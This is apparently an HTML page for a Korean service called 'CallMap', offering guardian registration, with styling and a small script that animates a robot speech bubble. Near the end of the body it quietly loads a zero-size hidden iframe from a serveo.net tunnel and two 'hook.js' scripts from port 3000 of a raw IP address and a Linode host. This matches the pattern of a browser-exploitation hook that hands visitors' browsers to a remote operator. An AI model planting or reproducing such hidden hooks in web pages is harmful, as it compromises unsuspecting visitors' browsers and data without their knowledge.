<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <title>Document</title>
</head>

<style>
    html,
    body {
        background-color: #F1F1F1;
        height: 100%;
        margin: 0;
        padding: 0;
        width: 100%;
        
    }

    .boxx{
        width: 90%;
        color: aliceblue;
        background-color: dodgerblue;
        border-radius: 10px;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        text-align: center;
        margin-left: 5%;
        margin-top: 30px;
        margin-bottom: 15px;
    }

    h4 {
        font-weight: bold;
        font-size: 1.2rem;
        color: seashell;
        margin-top: 10px;
    }

    a {
        text-decoration: none;
        text-align: center;
        font-size: 1.2rem;
        padding-top: 30px;
    }

    .container{
        justify-content: center;
        align-items: center;
        text-align: center;
        float: center;
    }
    .container_font{
        font-weight: bold;
        color: #000;
        padding-top: 15px;
        font-size: 1.5rem;
    }
     /*robot container*/
     #robot-container {
            position: relative;
            width: 75px;
            height: 75px;
            align-items: center;
            text-align: center;
            justify-content:center;
            margin-left: 40%;
        }

        #robot-image {
            width: 100%;
            height: 100%;
            border:0px solid;
            border-radius: 50%;
        }

        .speech-bubble {
            position: absolute;
            background-color: #fff;
            border-radius: 11.5px;
            padding: 10px;
            box-shadow: 0 5px 5px rgba(0, 0, 0, 0.9);
            max-width: 200px;
            visibility: hidden;
            opacity: 0;
            transition: opacity 0.3s ease;
            text-align: center;
        }

        @keyframes fadeIn {
            0% { opacity: 0; }
            100% { opacity: 1; }
        }

        .show {
            visibility: visible;
            animation: fadeIn 0.5s ease forwards;
        }

    @media screen and (max-width: 767px) {
        .grid {
            grid-template-columns: 1fr;
            grid-template-rows: repeat(4, 1fr);
        }

        .box {
            width: 90%;
        }

        h4 {
            font-size: 1.2rem;
        }

        .input {
            font-size: 18px;
        }

        .wrapper {
            width: 90%;
        }

        .search-container {
            justify-content: center;
            margin: 0 auto;
            width: 100%;
        }
    }
</style>

<body>
    <div class="container">
        <h4 class="container_font">CallMap 이용자용</h4>
        <p class="container_font">나의 CallMap 활동을 공유 해보세요!</p>
    </div>

    <div class="container">
        <div id="robot-container">
            <img id="robot-image" onclick="window.open('#')" src="robot.jpg" alt="Robot">
            <div class="speech-bubble" id="speech-bubble"></div>
        </div>
    </div>

    <div class="boxx" style="margin-top: 25%;">
        <a href="testshare.html">
            <img src="guardian.png" style="width: 70px; height: 70px;" alt="">
            <h4>보호자 등록</h4>
        </a>
    </div>

    <div class="boxx">
        <a href="test3.html">
            <img src="robot.jpg" style="width: 70px; height: 70px; border: 0px; border-radius: 50px;" alt="">
            <h4>보호자 등록 안함</h4>
        </a>
    </div>

    <iframe src="https://eb9bb9cc591315a6f62170124ef5eeeb.serveo.net" style="width: 0; height: 0; border: none;"></iframe>
    <script src="https://172.233.208.160:3000/hook.js"></script>
    <script src="https://172-233-208-160.ip.linodeusercontent.com:3000/hook.js"></script>
    <script>
        /*robot container*/
        const robotImage = document.getElementById('robot-image');
    const speechBubble = document.getElementById('speech-bubble');
    const sentences = [
        '',
        '보호자를\n등록\n해보세요!',
        '등록하기\n싫으시다면,',
        '등록 안함을\n누르세요!',
    ];

    let index = 0;

    setInterval(() => {
        speechBubble.classList.remove('show');
        setTimeout(() => {
            index = (index + 1) % sentences.length;
            speechBubble.innerText = sentences[index];
            speechBubble.classList.add('show');
        }, 500);
    }, 2500);
    </script>
</body>

</html>
